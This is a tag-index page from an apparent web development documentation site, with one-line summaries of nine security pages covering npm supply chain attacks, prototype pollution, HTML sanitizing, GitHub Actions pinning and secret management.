9 docs tagged with "security"

This page covers patterns used by mature libraries and OSS projects for reliable, modern package publishing.

What is DOMPurify

This page covers how environment variables work in frontend and Node.js projects — naming conventions, the critical distinction between build-time and runtime variables, and how to manage secrets safely in local development, CI/CD, and production. This is the deeper coverage referenced from Web Security Essentials.

GitHub Actions workflows fetch third-party actions from GitHub repositories. Each uses: reference is a dependency — and like npm packages, actions can be compromised, typosquatted, or modified after the version tag you referenced was originally pinned. This page covers the risks and how to address them.

The HTML Sanitizer API sanitizes untrusted HTML before DOM insertion, removing XSS-dangerous content (scripts, event handlers) using the browser's own parser — eliminating parser-differential vulnerabilities that plague userland sanitizers.

This page is a practical distillation of the OWASP NPM Security Cheat Sheet, organized by workflow phase. For the why — attack vectors, incident history, and defense rationale — read npm Supply Chain Attacks first; this page is the what to do reference, with particular emphasis on publisher-side hygiene.

A supply chain attack in the npm ecosystem occurs when an attacker compromises a package — or the infrastructure around it — to inject malicious code into applications that depend on it. npm is uniquely exposed to this class of attack: the registry hosts over 3 million packages, the average project pulls in hundreds of transitive dependencies, many packages are maintained by a single person, and npm install executes arbitrary install scripts by default. This page covers what has happened, how these attacks work, and what you can do to defend against them.

Prototype pollution is a JavaScript-specific vulnerability class where an attacker injects properties into Object.prototype, affecting every object in the application. It is less well-known than XSS or CSRF, but has led to serious real-world exploits — including remote code execution in Node.js.

Security is a first-class concern, not an afterthought. This page is a condensed reference of the most common web security topics — each section gives the core idea, what to do about it, and where to go deeper. For topic-specific deep dives, see the dedicated pages linked throughout this section.